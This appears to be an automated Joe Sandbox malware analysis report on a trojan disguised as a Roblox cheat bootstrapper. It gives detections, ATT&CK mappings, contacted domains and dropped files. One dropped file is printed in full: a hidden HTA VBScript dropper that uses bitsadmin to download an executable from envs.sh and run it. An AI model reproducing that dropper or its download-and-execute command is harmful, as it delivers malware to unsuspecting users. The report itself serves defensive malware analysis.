          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Process created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe"
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Queries volume information: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 1 Exploitation for Client Execution; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: 1 BITS Jobs; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 51 Virtualization/Sandbox Evasion; 1 BITS Jobs; 11 Process Injection; 2 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 1 Query Registry; 131 Security Software Discovery; 1 Process Discovery; 51 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery; System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
          [Behavior graph. ID: 1511791; Sample: SecuriteInfo.com.Trojan.Sig...; Start date: 16/09/2024; Architecture: WINDOWS; Score: 100]

          Source | Detection | Scanner | Label
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe | 68% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe | 57% | Virustotal |
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe | 100% | Avira | TR/Dropper.Gen
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe | 100% | Avira | TR/Redcap.oczed
          C:\Users\user\AppData\Local\Temp\BITD1EE.tmp | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe | 75% | ReversingLabs | Win32.Trojan.Generic

          No Antivirus matches

          Source | Detection | Scanner | Label
          envs.sh | 2% | Virustotal |
          getsolara.dev | 11% | Virustotal |
          www.nodejs.org | 0% | Virustotal |
          edge-term4-lhr2.roblox.com | 0% | Virustotal |
          pastebin.com | 0% | Virustotal |
          clientsettings.roblox.com | 0% | Virustotal |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          envs.sh | 89.163.145.170 | true | true | | unknown
          getsolara.dev | 104.21.93.27 | true | false | | unknown
          www.nodejs.org | 104.20.23.46 | true | false | | unknown
          edge-term4-lhr2.roblox.com | 128.116.119.3 | true | false | | unknown
          pastebin.com | 104.20.4.235 | true | true | | unknown
          clientsettings.roblox.com | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          https://getsolara.dev/ | true | 12%, Virustotal; Avira URL Cloud: phishing | unknown
          https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
          https://envs.sh/wUB.exe | true | Avira URL Cloud: safe | unknown
          https://getsolara.dev/asset/discord.json | true | 9%, Virustotal; Avira URL Cloud: phishing | unknown
          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
          https://pastebin.com/raw/pjseRvyK | false | Avira URL Cloud: safe | unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
          128.116.119.3 | edge-term4-lhr2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false
          89.163.145.170 | envs.sh | Germany | 24961 | MYLOC-ASIPBackboneofmyLocmanagedITAGDE | true
          104.21.93.27 | getsolara.dev | United States | 13335 | CLOUDFLARENETUS | false
          104.20.23.46 | www.nodejs.org | United States | 13335 | CLOUDFLARENETUS | false

          IP
          127.0.0.1
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1511791
          Start date and time:2024-09-16 12:21:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@11/14@5/6
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 212
          • Number of non-executed functions: 1
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.168.117.173
          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target BootstrapperV1.19.exe, PID 6516 because it is empty
          • Execution Graph export aborted for target SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, PID 7144 because it is empty
          • Execution Graph export aborted for target bitsadmin.exe, PID 3744 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          Time | Type | Description
          06:22:22 | API Interceptor | 2x Sleep call for process: svchost.exe modified
          06:22:23 | API Interceptor | 66x Sleep call for process: BootstrapperV1.19.exe modified
          06:22:45 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
          06:24:18 | API Interceptor | 2x Sleep call for process: bitsadmin.exe modified
          Match | Associated Sample Name / URL | Detection | Threat Name
          C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe | BootstrapperV1.19.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):1.3234442710382834
                                            Encrypted:false
                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvro:KooCEYhgYEL0In
                                            MD5:2BB9D268C96C8367219117E7462E48A9
                                            SHA1:9AAA1B2A27E8E0FC98B54BD35FD1797EAC00ED89
                                            SHA-256:54C1AD4ADA0FEEDB3B4090673189C8CFCED280DD5B3F4EB903A971ED9818B271
                                            SHA-512:36830FCD3E7A92A0EB92739C86826C078B0786F19194E3B7632D81ED4E39F82458D66BB73C27E2680B4A1D297756A2AF2A632EF02DFA971599E2840B8F689569
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x852dc0b9, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.42215743714096754
                                            Encrypted:false
                                            SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                            MD5:8178096ACF9C13ED2DC1D6CA8C7FA4A0
                                            SHA1:C9745FDF400AD10F7A961B71A91BBB0CC2A4F952
                                            SHA-256:8594CB32C4EB6A1A83C751719CEA8729177F8BCA9AF8C1EA631A5762881F5DCE
                                            SHA-512:5DEC009A7A972F41AF693F2348C585E85B467FACD415F3FD23ECBBEDA99268F9004888E1A6AF34859B0A25DCB468D9DC409D074BCDD68D59B00E995942839B27
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.07702863859174698
                                            Encrypted:false
                                            SSDEEP:3:8ll8YeEP+05ejjn13a/24D1Zl/illcVO/lnlZMxZNQl:c8zN0Aj53q2LOewk
                                            MD5:90C168266C16C675CAEE004A1965CF03
                                            SHA1:A75F623CC0CA5572F35018C0FA49B912441FE68A
                                            SHA-256:12CC1A4F141055A43901037439AACA7A06AF0E1E7B4D57C32F307483E5DDF38C
                                            SHA-512:424C67376BBC3E4095C068B05C25C1467E11F3A749551950C9A1A090FEC8C9CB111508282CCED93B6BA2E19A67C22AA89FA195CB98A7E0FBEA111BD4F46E8694
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.2316132178446182
                                            Encrypted:false
                                            SSDEEP:192:nBRNF2GYr0bU9+dQVa+xkl8vAEZizuiF0Z24lO8g:BJ2GnbG+dQVa+qehZizuiF0Y4lO8g
                                            MD5:6EE99E056ED1B46885F79D9098F2DA7C
                                            SHA1:C71D9F15531F0D503C7F3F1D3001A1E0A6AB87FB
                                            SHA-256:5104B59DBF63AF57CD1473CFC777DA68F1665179FC05259666CEE998088AF6CF
                                            SHA-512:9676DA91FA46276ECB7400CE88E3F39F05E622090AA1DFA1E79F169EE26673EA1723744876074CC6C669D82B4579F82931B48DDDEFDC1739E02915F5EB5A0BB4
                                            Malicious:false
                                            Reputation:low
                                            Preview:Version=1..EventType=CLR20r3..EventTime=133709557520060789..ReportType=2..Consent=1..UploadTime=133709557528029556..ReportStatus=524384..ReportIdentifier=c2c7818f-367b-488c-a5c1-1dea1ec5c425..IntegratorReportIdentifier=e36513d0-8a11-4d33-999c-c6350294073f..Wow64Host=34404..NsAppName=BootstrapperV1.19.exe..OriginalFilename=SolaraBootstrapper.exe..AppSessionGuid=00001974-0001-0014-ed06-0d502208db01..TargetAppId=W:00062fe173631cadc4a7695d39957a12de9c00000000!0000e27eff4cd4d383f5c564cce2bd1aaa2ffe4
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Mini DuMP crash report, 16 streams, Mon Sep 16 10:22:32 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):583644
                                            Entropy (8bit):3.219558383892526
                                            Encrypted:false
                                            SSDEEP:6144:1ajuKR+bGxIl3rc0A+mD/MLwkqWhz3QTT:cC9bGwYD/MLBq+Q
                                            MD5:6393FA891F7B853C7220F5FB451CEBAE
                                            SHA1:D144AB591AB4153EEF21031AA11E11E38CE045C7
                                            SHA-256:E2525FCCE0E827295C5262141F288EAE4E1BDCAF8DD5F373749F71939DCE379B
                                            SHA-512:5BD2D8270F2D4A32022FEA7BED3A75AC4155D6FF8D90D767DAB0A236D6CD6ECBFD9AECF1B1DE68D091EBB64574DEC48ED7BE86F9B3C5149D7BDE3489892BFBD4
                                            Malicious:false
                                            Preview:MDMP..a..... ..........f............4...........d...T.......<....(....... ...(......TX.............l.......8...........T............U.............|I..........hK..............................................................................eJ.......L......Lw......................T.......t......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):6820
                                            Entropy (8bit):3.7180438023880322
                                            Encrypted:false
                                            SSDEEP:96:RSIU6o7wVetbxqMsRXYZL/8n1vm5aM4U389b44Dr4rVfrIm:R6l7wVeJxqFRXYZj81Gpr389b44cfrIm
                                            MD5:8A6C5D4761801CB13EF373DCAD704BD5
                                            SHA1:36AE52419DED28A1C07F560D0CABA843B7819A5D
                                            SHA-256:F549ACD3831B9D3992C42C0D5A8DCDBA793019C4399AFEB851ECF10C4A79C399
                                            SHA-512:54EA5B47163DED8983229E97AB985EE31B5E4553BC985D895096A513D180351696463F91B7ACE81F75CE5E317FF74435C0AC11FE0D8887E4457B9C615B4BF116
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>..<OSVersionInformation>..<WindowsNTVersion>10.0</WindowsNTVersion>..<Build>19045</Build>..<Product>(0x30): Windows 10 Pro</Product>..<Edition>Professional</Edition>..<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..<Revision>2006</Revision>..<Flavor>Multiprocessor Free</Flavor>..<Architecture>X64</Architecture>..<LCID>2057</LCID>..</OSVersionInformation>..<ProcessInformation>..<Pid>6516</Pi
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4834
                                            Entropy (8bit):4.46573552928604
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zssJg771I91KWpW8VYxYm8M4JM/Ftyq8vyvZew0Md:uIjfqI76r7V9JmWaZeFMd
                                            MD5:80BB6A3A6C07FC1649731C1D4E8CB897
                                            SHA1:3C2B3BD5B5B81F202CF5083F401E228B95A49327
                                            SHA-256:28765EC0C90183297CF2DBC86DFB83461E0A448C46D58C3742579A670D5626F1
                                            SHA-512:AFB086081095555B380D6DCAE1D50DF1967AA3C8B5CAC4F06FEBC88B31BECF783C3CDA7336E9BF04C2809A723E581498AF2AA50CD160D06BC7CF655C6D5E4231
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="502645" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):654
                                            Entropy (8bit):5.380476433908377
                                            Encrypted:false
                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):80384
                                            Entropy (8bit):0.7660406673087843
                                            Encrypted:false
                                            SSDEEP:192:BTeTVUkbERHs1pWA4avskoY6g1KbbCcDD:wVUkyHs1pig6g17cX
                                            MD5:75C85B7E8AB404F086BC180768B67081
                                            SHA1:8D1E90B4C05C0F056AF593736B0305C5D7CF518B
                                            SHA-256:553BC97BCBE4671D4B76082B03B65AD6B9517B3AAF83D850400D64258CE68BBB
                                            SHA-512:1218AB14ED88ADE7DCA8E7C98E41D84240523678FFA8276DFFA96D2A5332711CE35C59A3E3226717A532BF9C34CA23D3782C86962138478A768DE714F1E913FB
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................0...........O... ...`....@.. ....................................@..................................N..S....`............................................................................... ............... ..H............text...$/... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................O......H........n..(.......&.....................................................(....*.r...p*. `..*..(....*.r/..p*. ~.H.*.s.........s.........s.........s.........*.r]..p*. S...*.r...p*.r...p*.r...p*. ...*.r...p*. .O..*..((...*.r0..p*.r^..p*. ....*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(a...*"(....+.*&()...&+.*.+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-.*.r...p*.r...p*. Q.O.*.r...p*. 6...*.r&..p*.rT..p*. O...*.r...p*. ..a.*.r...p*. ....*.r...p*.r...p*. .x!.*.r:.
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):995840
                                            Entropy (8bit):5.630174987352983
                                            Encrypted:false
                                            SSDEEP:24576:DIbp4sZotkNjFC/4qxp+k+kPFoHZvPrSMc:cvotkNjg/lhqZvG
                                            MD5:90FD25CED85FE6DB28D21AE7D1F02E2C
                                            SHA1:E27EFF4CD4D383F5C564CCE2BD1AAA2FFE4EC056
                                            SHA-256:97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F
                                            SHA-512:1C775CF8DFDE037EAA98EB14088C70D74923F0F6A83030A71F2F4C1A4453F6154DAB7A4AA175E429860BADDA3E5E0AE226F3C3E8171332F5962BF36F8AA073FA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 75%
                                            Joe Sandbox View:
                                            • Filename: BootstrapperV1.19.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...an.f.........."......(..........rF... ....@...... ....................................`..................................................F..T....`..u............................................................................F............... ..H............text....&... ...(.................. ..`.rsrc...u....`.......*..............@..@.reloc...............0..............@..BH........P..\............................................................0*...........(....r...p(....s......r...po.....sq......o.....ow...o....r...po....9,....ow...rD..poj.....9.....rp..pr|..po2..............9.....o..........&......r|..p.....s........o......r~..p~....r...p(....o......r...po.............9......o..........&..........:......r|..p(....98....s........r...po.............9......o..........&........r...p(....9....r...p(......(....9....r...p..(....s........o......r~..p~....r.
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):827
                                            Entropy (8bit):5.298344908566429
                                            Encrypted:false
                                            SSDEEP:24:hMNmMvy4GqptE0ia5WNp8xuY8y+shEr88+M8E4olEC:ImMqopO0Jqd4+sGXt40F
                                            MD5:702C5998DD6D976C132C044F3A1AC842
                                            SHA1:C96E3B78885214A5652C4D44233BACEED1D93AF3
                                            SHA-256:5F7FFB6600B1AA604090C18B79367DDE254847E01DBE0A8027BA83F8216B51DF
                                            SHA-512:23F3E80C4847CEEF98ABA552B82964A847582D095FED4C8F7069CCE747EC09327D3D7A69403A826972A7C51431947B312A0457201379110F2BFC2008B9D90E2B
                                            Malicious:true
                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">.. <head>.. <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />.. <script language="VBScript">..Window.ReSizeTo 0, 0..Window.MoveTo -4000, -4000..set oShell = CreateObject("WScript.Shell")..Dim Str..Str = "%Temp%" & "\cheat.exe"..const DontWaitUntilFinished = false, ShowWindow = 1, DontShowWindow = 0, WaitUntilFinished = true..oShell.Run "bitsadmin /transfer 8 https://envs.sh/wUB.exe " & Str, DontShowWindow, WaitUntilFinished..oShell.Run Str..Close.. </script>.. <hta:application id="oHTA" applicationname="Bonjour" application="yes" width="10px" height="10px"></hta:application>.. </head>.. <body>.. </body>..</html>......
                                            Process:C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):103
                                            Entropy (8bit):3.9770111444684244
                                            Encrypted:false
                                            SSDEEP:3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm
                                            MD5:487AB53955A5EA101720115F32237A45
                                            SHA1:C59D22F8BC8005694505ADDEF88F7968C8D393D3
                                            SHA-256:D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368
                                            SHA-512:468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C
                                            Malicious:false
                                            Preview:{. "args" : {. "code" : "xRCaC7cdBn". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.465729750120641
                                            Encrypted:false
                                            SSDEEP:6144:xIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNRdwBCswSby:SXD94VWlLZMM6YFHD+y
                                            MD5:124A5E4456F5085D7D2062C1EE5091EE
                                            SHA1:0297D159BED514EFF13175232124F2F0E215D229
                                            SHA-256:5422A2D0AB0AC9643F89FB7B792747255C1BDE2F2FDE1C049486A5CD107EF55D
                                            SHA-512:C84AFCA39020E7CA17719E1864DAEBA2370FE8DFA659A568AC00E29514DDD0387797103110A2D224F01631393FE9F078B2908941D792AA1995EE338F66788D11
                                            Malicious:false
                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..V"...............................................................................................................................................................................................................................................................................................................................................J..b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            File Type:ISO-8859 text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):571
                                            Entropy (8bit):4.9398118662542965
                                            Encrypted:false
                                            SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
                                            MD5:5294778E41EE83E1F1E78B56466AD690
                                            SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
                                            SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
                                            SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
